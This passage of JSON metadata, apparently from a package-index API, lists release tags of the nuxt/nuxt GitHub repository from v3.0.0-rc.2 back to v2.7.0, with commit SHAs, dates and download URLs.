https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/n